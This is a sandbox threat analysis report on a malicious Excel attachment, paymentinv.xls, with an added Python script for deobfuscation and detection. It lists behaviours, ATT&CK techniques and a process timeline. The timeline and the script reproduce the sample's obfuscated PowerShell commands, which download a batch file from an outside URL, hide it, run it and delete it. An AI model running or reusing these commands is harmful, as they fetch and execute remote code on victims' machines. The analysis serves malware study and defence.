Threat Analysis Report: Paymentinv

The document analyzes a file called paymentinv.xls and details its behaviors and classification. It found the file exhibits very high threat levels and behaviors like hiding, spreading, exploiting, networking and bypassing security solutions. It spawned Powershell processes and used DDE to create new processes. The timeline shows the file and processes it launched.


McAfee Advanced Threat Defense | Threat Analysis Report

File Name: paymentinv.xls
Threat Level: ⬤ 5 - Very High
Malware Name: TYPE_TROJAN
Engine: GTI File Reputation
File Submitted: 2021-04-19 03:45:22 UTC
Processing Time: 41 seconds
File Size: 281,600 bytes
Sandbox Replication: 27 seconds

Hash Values
MD5: F81192D7FB07CA8B5179A607B5A57A97
SHA-1: CBF2655B4D3CBCC21E5F1ACA8BB57CCE4804A09F
SHA-256: D05995AB739B6B995653FEE878B9ECA8CABE75DE5C62D9F0AE9C6E5D4A0557DB

File Details
Screenshots: 2
File Type: 1

Environment
Microsoft Windows 7 Professional Service Pack 1 (build 7601, version 6.1.7601), 64-bit
Windows® Internet Explorer version: 8.0.7601.17514
Microsoft Office version: 2007
PDF Reader version: 11.0
No Flash player installed
Flash player plugin version: 22.0.0.209
Platform Version: 4.12.0.7
Detection Package Version: 4.12.0.201112

Behavior Classification

Behavior | Severity

Hiding, Camouflage, Stealthiness, Detection and Removal Protection | ⬤ 5 - Very High
  Spawned Powershell Process from Office application | ⬤ 5 - Very High
  New process created using Dynamic Data Exchange (DDE) | ⬤ 4 - High
  Uses the Microsoft Cryptographic APIs | ⬤ 1 - Informational
  Set a filter function to supersede the top-level exception handler (http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx) | ⬤ 1 - Informational
  Changed the protection attribute of the process | ⬤ 1 - Informational

Spreading | ⬤ 5 - Very High
  Non-PE sample executed active content by shell application | ⬤ 5 - Very High

Exploiting, Shellcode | ⬤ 5 - Very High
  Non-PE sample executed active content by shell application | ⬤ 5 - Very High
  Created and set up new security descriptor for the running process | ⬤ 2 - Low

Networking | ⬤ 5 - Very High
  Non-PE sample executed active content by shell application | ⬤ 5 - Very High
  Set a filter function to supersede the top-level exception handler (http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx) | ⬤ 1 - Informational
  Retrieved the name of the network resource associated with a local device | ⬤ 1 - Informational

Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection | ⬤ 2 - Low
  Updated security descriptor for newly created process | ⬤ 2 - Low
  Ran Powershell commands from a specified file | ⬤ 2 - Low
  Ran Powershell commands from a specified file | ⬤ 2 - Low
  Hooked Windows System APIs | ⬤ 2 - Low
  Created named mutex object | ⬤ 2 - Low
  Allowed the process to perform system-level actions that were not enabled previously | ⬤ 2 - Low
  Allocated and initialized security descriptor for newly created process | ⬤ 2 - Low
  Set a filter function to supersede the top-level exception handler (http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx) | ⬤ 1 - Informational
  Retrieved system information such as Processor Architecture, Number Processors, Processor Type | ⬤ 1 - Informational
  Obtained user's logon name | ⬤ 1 - Informational
  Altered the process's security descriptors for access control and ownership | ⬤ 1 - Informational

Data spying, Sniffing, Keylogging, Ebanking Fraud | ⬤ 2 - Low
  Set hook procedure to control system activities | ⬤ 2 - Low
  Enumerated through different files and directories on host system | ⬤ 1 - Informational

Persistence, Installation Boot Survival | ⬤ Unverified

Processes Analyzed

Name | Reason | Severity
paymentinv.xls | loaded by MATD Analyzer & dropped by paymentinv.xls | ⬤ 5 - Very High
attrib.exe | executed by excel & executed by powershell | ⬤ Unverified
cmd.exe | executed by excel & dropped by paymentinv.xls & executed by powershell | ⬤ 5 - Very High
powershell.exe | executed by cmd.exe | ⬤ 5 - Very High

Timeline Activity

(Chart in the original report: the processes paymentinv.xls, attrib.exe, cmd.exe and powershell.exe plotted against offset in seconds, 0 to 18; event categories shown are Processes, Files, Registry Operations, Network Operations and Multiple Operations. The per-event detail follows under "Timeline Activity Details".)

Techniques Observed (MITRE ATT&CK™ Matrix)

Technique | Tactics

Execution through API | Execution

Adversary tools may directly use the Windows application programming interface (API)
to execute binaries. Functions such as the Windows API CreateProcess will allow
programs and scripts to start other processes with proper path and argument
parameters.

  Spawned Powershell Process from Office application | ⬤ 5 - Very High

PowerShell | Execution

PowerShell is a powerful interactive command-line interface and scripting environment
included in the Windows operating system. Adversaries can use PowerShell to perform a
number of actions, including discovery of information and execution of code. Examples
include the Start-Process cmdlet which can be used to run an executable and the
Invoke-Command cmdlet which runs a command locally or on a remote computer.

  Spawned Powershell Process from Office application | ⬤ 5 - Very High
  Ran Powershell commands from a specified file | ⬤ 2 - Low

Dynamic Data Exchange | Execution

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or
continuous inter-process communication (IPC) between applications. Once a link is
established, applications can autonomously exchange transactions consisting of
strings, warm data links (notifications when a data item changes), hot data links
(duplications of changes to a data item), and requests for command execution.

  New process created using Dynamic Data Exchange (DDE) | ⬤ 4 - High

Scripting | Execution, Defense Evasion

Adversaries may use scripts to aid in operations and perform multiple actions that
would otherwise be manual. Scripting is useful for speeding up operational tasks and
reducing the time required to gain access to critical resources. Some scripting
languages may be used to bypass process monitoring mechanisms by directly interacting
with the operating system at an API level instead of calling other programs. Common
scripting languages for Windows include VBScript and PowerShell but could also be in
the form of command-line batch scripts.

  Non-PE sample executed active content by shell application | ⬤ 5 - Very High

Hooking | Persistence, Privilege Escalation, Credential Access

Windows processes often leverage application programming interface (API) functions to
perform tasks that require reusable system resources. Windows API functions are
typically stored in dynamic-link libraries (DLLs) as exported functions.

  Set hook procedure to control system activities | ⬤ 2 - Low

Obfuscated Files or Information | Defense Evasion

Adversaries may attempt to make an executable or file difficult to discover or
analyze by encrypting, encoding, or otherwise obfuscating its contents on the system
or in transit. This is common behavior that can be used across different platforms
and the network to evade defenses.

  Uses the Microsoft Cryptographic APIs | ⬤ 1 - Very Low

File and Directory Discovery | Discovery

Adversaries may enumerate files and directories or may search in specific locations
of a host or network share for certain information within a file system.

  Enumerated through different files and directories on host system | ⬤ 1 - Very Low

Network Share Discovery | Discovery

Networks often contain shared network drives and folders that enable users to access
file directories on various systems across a network.

  Retrieved the name of the network resource associated with a local device | ⬤ 1 - Very Low

System Information Discovery | Discovery

An adversary may attempt to get detailed information about the operating system and
hardware, including version, patches, hotfixes, service packs, and architecture.

  Retrieved system information such as Processor Architecture, Number Processors, Processor Type | ⬤ 1 - Very Low
  Obtained user's logon name | ⬤ 1 - Very Low
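The five cmd.exe command lines recorded in the timeline below show what the "Scripting" and "PowerShell" techniques above actually look like for this sample: cmd.exe caret escapes (powershe^l^l), PowerShell backtick escapes (start`-sle`ep, new-ob`ject, $e`nv:t`emp), a concatenated method name (('down'+'loadfile').invoke), a hidden window (-w 1), and Start-Sleep delays of 1, 3, 7 and 12 seconds that stage the download, the attrib +s +h, the move into %TEMP%, the execution and the deletion of pd.bat. The Python below is an added example, not code from the McAfee report or from the sample: it normalizes those command lines and flags any cmd.exe or powershell.exe whose ancestry includes an Office application. The command strings are the ones the report records; the process records, PIDs, parent links, image-name sets and indicator regexes are constructed assumptions.

```python
"""Deobfuscate and triage the Excel -> cmd.exe -> powershell.exe chain.

Added example for the report above; not code from McAfee or from the sample.
"""
import re
from typing import Dict, List

# Assumed image-name sets for the parent/child rule.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe"}

# The five cmd.exe command lines the report's timeline records for this sample.
CMD_LINES = [
    "cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')",
    "cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat",
    'cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"',
    'cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"',
    "cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force",
]

# Assumed triage patterns, matched against the normalized command line.
INDICATORS = {
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I),
    "webclient_download": re.compile(r"net\.webclient\).*?downloadfile", re.I),
    "hide_dropped_file": re.compile(r"\battrib\s+(?:\+[shr]\s*)+", re.I),
    "staged_delay": re.compile(r"\bstart-sleep\s+\d+", re.I),
    "self_delete": re.compile(r"\bremove-item\b.*-force", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)


def strip_cmd_carets(s: str) -> str:
    """cmd.exe's escape character: ^x becomes x, so powershe^l^l reads powershell."""
    return re.sub(r"\^(.)", r"\1", s)


def strip_ps_backticks(s: str) -> str:
    """PowerShell's escape character. The sample only uses it to split tokens
    (start`-sle`ep, new-ob`ject, $e`nv:t`emp), so for triage every tick is
    dropped; a full parser would keep `n, `t and friends inside strings."""
    return s.replace("`", "")


def join_string_concats(s: str) -> str:
    """'a'+'b' -> 'ab' until stable, then .('name').invoke( -> .name( so the
    concatenated method call reads as the plain DownloadFile() it is."""
    prev = None
    while prev != s:
        prev, s = s, re.sub(r"'([^']*)'\s*\+\s*'([^']*)'", r"'\1\2'", s)
    return re.sub(r"\.\(\s*'([^']*)'\s*\)\.invoke\(", r".\1(", s, flags=re.I)


def deobfuscate(cmdline: str) -> str:
    return join_string_concats(strip_ps_backticks(strip_cmd_carets(cmdline)))


def build_sample_events() -> List[dict]:
    """Constructed process-creation records. PIDs and parent links are invented
    and follow the report's Processes Analyzed table (excel -> cmd -> powershell)."""
    events = [{"pid": 100, "ppid": 4, "image": "excel.exe",
               "cmdline": "EXCEL.EXE paymentinv.xls"}]
    for i, line in enumerate(CMD_LINES):
        cmd_pid, ps_pid = 200 + i, 300 + i
        events.append({"pid": cmd_pid, "ppid": 100, "image": "cmd.exe", "cmdline": line})
        # cmd.exe consumes the carets before launching the child, so the
        # powershell.exe record carries only the backtick obfuscation, as in the report.
        events.append({"pid": ps_pid, "ppid": cmd_pid, "image": "powershell.exe",
                       "cmdline": strip_cmd_carets(line)[len("cmd /c "):]})
    return events


def ancestry(pid: int, by_pid: Dict[int, dict]) -> List[str]:
    """Image names from the process up to the root: [self, parent, grandparent, ...]."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def triage(events: List[dict]) -> List[dict]:
    """Flag every cmd.exe/powershell.exe whose ancestry includes an Office application."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e["pid"], by_pid)
        if chain[0] not in SHELL_IMAGES or not OFFICE_IMAGES & set(chain[1:]):
            continue
        clean = deobfuscate(e["cmdline"])
        findings.append({
            "pid": e["pid"],
            "chain": " <- ".join(chain),
            "obfuscated": clean != e["cmdline"],
            "indicators": sorted(n for n, rx in INDICATORS.items() if rx.search(clean)),
            "urls": URL_RE.findall(clean),
            "deobfuscated": clean,
        })
    return findings


if __name__ == "__main__":
    for f in triage(build_sample_events()):
        print(f"pid {f['pid']:>3} {f['chain']}")
        print(f"    indicators={f['indicators']} urls={f['urls']}")
        print(f"    {f['deobfuscated']}")
```

Run stand-alone it prints ten findings, one per cmd.exe and powershell.exe record, each with its Office ancestry, the indicators that fired and the cutt.ly URL pulled from the normalized DownloadFile call. The ancestry check is what makes the rule robust: the obfuscation changes from campaign to campaign, but an Office application launching a shell does not, and the deobfuscation only serves to recover the IOCs once that chain has fired.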

Timeline Activity Details

Time Offset Event Details

File
00:00:000 Operations, Retrieved the full path for the module
miscellaneous

File
00:00:000 Operations, Obtained the path of the Windows system directory
miscellaneous
00:00:000 Others Initialized a critical section object and set the spin count for the critical section

Process
Retrieved information on a specific string in the current activation context
00:00:000 Operations,
miscellaneous

Process
00:00:000 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_Read
miscellaneous

Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_ReadWrite
miscellaneous

Registry HKLM\Software\Microsoft\Windows\CurrentVersion
00:00:016
Read CommonFilesDir

Registry
00:00:016 HKLM\Software\Microsoft\Windows\CurrentVersion
Opened

Registry
00:00:032 HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf
Opened

Process
Deactivated the activation context corresponding to the specified cookie
00:00:094 Operations,
miscellaneous

00:00:094 Others Obtained the system metric or system configuration setting

Process
Queried the activation context
00:00:094 Operations,
miscellaneous

Process {C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}
00:00:157 Created

Registry
00:00:157 HKCU\Software\Microsoft\Office\12.0\Excel
Opened

Registry HKCU\Software\Microsoft\Office\12.0\Excel
00:00:157
Read DisableThreadAffinity

00:00:157 Others Recorded system information

2f70368f
Thread
00:00:157
Created

Process
00:00:172 Operations, Obtained the identifier of the thread or process that created the specified window
miscellaneous

Registry
00:00:204 HKCU\Software\Microsoft\.NETFramework
Opened

Registry HKLM\SOFTWARE\Microsoft\Fusion
00:00:219
Read NoClientChecks

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read InstallRoot

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read OnlyUseLatestCLR

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read UseLegacyV2RuntimeActivationPolicyDefaultValue

Registry
Enumerated the values for an open registry key
00:00:219 Operations,
miscellaneous

Registry
00:00:219 HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades
Opened

Registry
00:00:219 HKLM\Software\Microsoft\.NETFramework
Opened

Registry
00:00:219 HKLM\SOFTWARE\Microsoft\Fusion
Opened

File
00:00:219 Operations, Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll
Files 20000
00:00:219
Opened 10000000

C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config


Files Read
00:00:219
Opened Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll
00:00:219 Files 20000
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll
Files 20000
00:00:219 Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll
Files 20000
00:00:219
Opened 10000000

00:00:219 Files Read C:\Windows\Microsoft.NET\Framework\

00:00:219 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727

File
00:00:219 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous

00:00:297 Others Retrieved the current local date and time

Process
00:00:610 Operations, Install a new hook procedure (type: WH_MSGFILTER)
miscellaneous

Process
00:00:610 Operations, Install a new hook procedure (type: WH_KEYBOARD)
miscellaneous

Process
00:00:625 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous

{FA445657-9379-11D6-B41A-00065B83EE53}
Process
00:00:625
Created

File
00:00:657 Operations, Obtained the current directory for the current process
miscellaneous

File
00:00:672 Operations, Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*
miscellaneous

File
00:00:672 Operations, Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
miscellaneous

File
00:00:938 Operations, Searched a directory for the name: C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls
miscellaneous

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:00:969
Created

00:01:047 Files Read C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Socket
00:01:141 Retrieved the name of the network resource associated with a local device
Activities

00:01:141 Others Obtained the current system date and time in in Coordinated Universal Time (UTC) format

File
00:01:172 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous

{88D969EC-8B8B-4C3D-859E-AF6CD158BE0F}
Process
00:01:297
Created

{88D969EF-F192-11D4-A65F-0040963251E5}
Process
00:01:329
Created

{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
Process
00:01:735
Created

system
Process
00:01:735 Created cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')
Created

{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
Process
00:01:735
Created

Files
00:01:844 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\254f614b-21fd-47d9-99c3-f23fd434845c.LNK
Deleted

Files
00:01:954 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\dgwseciilw.LNK
Deleted

Process
00:02:266 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous

Registry
00:02:266 HKCU\Software\Policies\Microsoft\Windows\System
Opened

File
00:02:282 Operations, Retrieved the full path for the module
miscellaneous

Registry
00:02:282 HKCU\Software\Microsoft\Command Processor
Opened

Registry
00:02:282 Opened HKLM\Software\Microsoft\Command Processor

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read AutoRun

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read CompletionChar

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DefaultColor

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DelayedExpansion

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DisableUNCCheck

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read EnableExtensions

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read PathCompletionChar

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read AutoRun

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read EnableExtensions

File
00:02:282 Operations, Obtained the current directory for the current process
miscellaneous

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read CompletionChar

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DefaultColor

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DelayedExpansion

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DisableUNCCheck

Process
00:02:282 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read PathCompletionChar

File
00:02:296 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous
00:02:296 Files Read C:\Users\Administrator\Documents

File
00:02:296 Operations, Searched a directory for the name: C:\Users
miscellaneous

File
00:02:296 Operations, Searched a directory for the name: C:\Users\Administrator
miscellaneous

File
00:02:296 Operations, Searched a directory for the name: C:\Users\Administrator\Documents
miscellaneous

00:02:312 Others Retrieved information about a locale specified by a identifier

00:02:375 Files Read .

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\system32\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\powershell
miscellaneous

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:391 powershell -w 1 start`-sle`ep 1; attrib +s +h pd.bat
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:391 powershell -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"
Created

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\system32\powershell.*
miscellaneous

File
00:02:391 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\powershell.*
miscellaneous

File
00:02:407 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.COM
miscellaneous

File
00:02:407 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
miscellaneous

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:407 powershell -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:407 powershell -w 1 start`-sle`ep 12; remove-item -path pd.bat -force
Created

Process
00:02:437 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous

File
00:02:437 Operations, Retrieved the full path for the module
miscellaneous

{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}
Process
00:02:454 Created

{90AA3A4E-1CBA-4233-B8BB-535773D48449}
Process
00:02:454
Created

{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
Process
00:02:454
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:454 powershell -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')
Created

Process
00:02:469 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous

{660B90C8-73A9-4B58-8CAE-355B7F55341B}
Process
00:02:469
Created

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:02:484
Created

{1F3427C8-5C10-4210-AA03-2EE45287D668}
Process
00:02:891
Created

{F3364BA0-65B9-11CE-A9BA-00AA004AE837}
Process
00:02:891
Created

{603D3801-BD81-11D0-A3A5-00C04FD706EC}
Process
00:02:921
Created

{DD313E04-FEFF-11D1-8ECD-0000F87A470C}
Process
00:02:937
Created

{00021401-0000-0000-C000-000000000046}
Process
00:03:579
Created

Process {76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
00:03:579 Created

{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
Process
00:03:609
Created

File
00:03:704 Operations, Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe
miscellaneous

00:03:704 Others Expanded environment-variable strings and replace them with the values defined for the current use

Registry
00:03:891 HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:891
Read RuntimeVersion

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:891
Read PowerShellVersion

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1
00:03:891
Read

Registry
00:03:891 HKLM\SOFTWARE\Microsoft\PowerShell
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:907
Read ConsoleHostAssemblyName

Registry
00:03:921 HKLM\Software\Microsoft\.NETFramework
Opened

Registry HKLM\Software\Microsoft\.NETFramework
00:03:921
Read InstallRoot

Process
00:03:921 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

File
00:03:921 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll
Files 20000
00:03:937
Opened 10000000

Registry
00:03:937 HKCU\Software\Microsoft\.NETFramework
Opened
File
00:03:937 Operations, Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous

00:03:937 Files Read C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

Files
00:03:969 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X43D78XIIKCRAJNR9GZN.temp
Deleted

00:03:969 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727

Registry HKLM\SOFTWARE\Microsoft\Fusion
00:03:969
Read NoClientChecks

Registry
00:03:969 HKLM\SOFTWARE\Microsoft\Fusion
Opened

Registry HKLM\Software\Microsoft\.NETFramework
00:03:969
Read OnlyUseLatestCLR

Registry HKLM\Software\Microsoft\.NETFramework
00:03:969
Read UseLegacyV2RuntimeActivationPolicyDefaultValue

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config
Files Read
00:03:969
Opened Normal

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll
Files 20000
00:03:969
Opened 10000000

Signal
00:03:984 Opened an existing named event object
Objects

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Files 20000
00:03:984
Opened 10000000

Registry HKLM\Software\Microsoft\.NETFramework
00:03:984
Read DisableConfigCache

Process
00:04:000 Operations, Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_ReadWrite
miscellaneous

Process
00:04:000 Operations, Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_Read
miscellaneous

00:04:015 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll

Registry
00:04:032 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
Opened

Registry
00:04:032 Opened HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
Files Read
00:04:032
Opened Normal

Registry
00:04:032 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch
Opened

00:04:032 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config

Process
00:04:046 Operations, Determined whether the specified process is running under WOW64
miscellaneous
Registry
00:04:046 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
Opened

Registry
00:04:046 HKLM\Software\Microsoft\Fusion
Opened

Registry
00:04:063 HKCU\Software\Microsoft\Fusion
Opened

00:04:063 Others Initialized a new security descriptor

00:04:063 Others Allocated and initialized a security identifier (SID)

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read ForceLog

Registry HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options


00:04:063
Read DevOverrideEnable

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LogFailures

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read EnableLog

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read DownloadCacheQuotaInKB

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read DisableMSIPeek

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read CacheLocation

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LogResourceBinds

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LoggingLevel

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read NoClientChecks

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read UseLegacyIdentityFormat

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read VersioningLog

Registry
00:04:063 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Opened

00:04:079 Others Obtained information about an access token

Process
00:04:079 Operations, Opened the access token associated with a thread
miscellaneous

Memory
00:04:079 Opened a named file-mapping object
Mapped Files

Process
00:04:079 Operations, Opened the access token associated with a process
miscellaneous

00:04:079 Others Set information in a security discretionary access control list (DACL)

Signal
00:04:110 global\cordbipcsetupsyncevent_2548
Objects

Signal
00:04:110 global\cordbipcsetupsyncevent_2804
Objects

Process powershell.exe
00:04:125
Opened QueryInformation

Signal
00:04:125 global\cordbipcsetupsyncevent_2540
Objects

Process
Decremented a thread's suspend count
00:04:125 Operations,
miscellaneous

72fe9a9f
Thread
00:04:125
Created

Process
00:04:140 Operations, Changed the protection attribute of process address: 0x72f12be4, new attribute: Execute_ReadWrite
miscellaneous

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config
Files Read
00:04:157
Opened Normal

Registry
00:04:157 HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500
Opened
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch
Files
00:04:157 Read
Opened
Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config
Files Read
00:04:157
Opened Normal

Registry
00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
Opened

Registry
